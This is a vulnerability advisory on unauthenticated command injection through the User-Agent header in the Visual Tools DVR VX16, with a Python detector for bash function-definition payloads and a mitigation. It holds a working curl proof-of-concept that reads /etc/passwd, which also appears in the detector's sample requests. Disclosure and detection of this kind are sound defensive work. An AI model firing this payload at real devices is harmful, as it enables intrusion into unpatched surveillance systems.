During a routine penetration testing session for a client, I stumbled upon a severe security flaw within the software Visual Tools, a trademark of AX Solution LA (https://visual-tools.com).
Vendor
The company designs and manufactures smart video surveillance products and people counting solutions for the professional market, sold under the Visual Tools brand. These products reach customers through an international distribution channel, which comprises a wide network of partners in more than 40 countries.
Technical Details
- Vulnerability: OS Command Injection
- CVSSv3.1 Base Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- CVSSv3.1 Base Score: 9.8 – Critical
In the following section, I will provide an in-depth technical analysis of this vulnerability, along with evidence and a proof-of-concept. This vulnerability poses a potential threat to hundreds of Internet-connected devices.
Description
The Visual Tools DVR VX16 4.2.28.0 has a vulnerability that enables an unauthenticated attacker to execute remote commands via shell metacharacters placed in the User-Agent HTTP header of a request to cgi-bin/slogin/login.py. The attack can be launched remotely without any form of authentication.
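As an added example (not part of the original advisory, and not the vendor's code), the following Python detector parses raw HTTP requests and flags any header whose value carries the bash function-definition prefix used by the PoC. It generalises slightly beyond the page by checking every header, since a CGI server exports all of them as environment variables, and marks hits on the login.py endpoint named above; the sample requests are constructed.

```python
import re
from dataclasses import dataclass

# Bash function-definition prefix from the PoC header ("() { :; };"); whatever
# follows it is what bash runs when the CGI server exports the header as a variable.
FUNC_DEF_RE = re.compile(r"\(\)\s*\{.*?\}\s*;")
TARGET_PATH = "/cgi-bin/slogin/login.py"  # endpoint named in the advisory

@dataclass
class Finding:
    client: str
    path: str
    header: str         # header carrying the injection
    commands: str       # what bash would execute after the function body
    known_target: bool  # request hit the login.py endpoint

def parse_request(raw: str):
    """Split a raw HTTP request into (path without query, {lower-cased header: value})."""
    lines = raw.strip("\n").splitlines()
    _method, path, _version = lines[0].split(maxsplit=2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return path.split("?", 1)[0], headers

def inspect_request(client: str, raw: str) -> list:
    """Flag every header whose value contains a bash function definition followed by commands."""
    path, headers = parse_request(raw)
    findings = []
    for name, value in headers.items():
        m = FUNC_DEF_RE.search(value)
        if m:
            findings.append(Finding(client, path, name, value[m.end():].strip(),
                                    path == TARGET_PATH))
    return findings

# Constructed sample traffic: a benign login request, the PoC header from the
# advisory, and the same prefix smuggled through a different header.
SAMPLES = [
    ("10.0.0.5", "GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: dvr\nUser-Agent: Mozilla/5.0\n"),
    ("203.0.113.9", "GET /cgi-bin/slogin/login.py HTTP/1.1\nHost: dvr\n"
                    "User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd\n"),
    ("203.0.113.9", "GET /cgi-bin/other.py HTTP/1.1\nHost: dvr\nReferer: () { :; }; /bin/id\n"),
]

def scan(samples=SAMPLES) -> list:
    return [f for client, raw in samples for f in inspect_request(client, raw)]
```

Feeding the detector from a reverse proxy or IDS in front of the DVR gives a signal on exploitation attempts even where the device itself cannot be patched.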
Proof of Concept
The following POC demonstrates how to execute system commands and gain a remote shell.
curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http://DVR_ADDR:PORT/cgi-bin/slogin/login.py
Details about the DVR
- System Information: Linux VSserver 2.6.35.4; i686 GNU/Linux
- Distribution: Embedded Debian GNU 0.7
- Bash: GNU bash, version 3.2.39(1)-release (i486-pc-linux-gnu)
Impact
An attacker can potentially gain access to the remote system and execute arbitrary commands on the Linux-based system as an unprivileged user.
Mitigation
To mitigate the risk of this vulnerability, I suggest not deploying the device directly on the internet. Instead, position the DVR behind a VPN connection.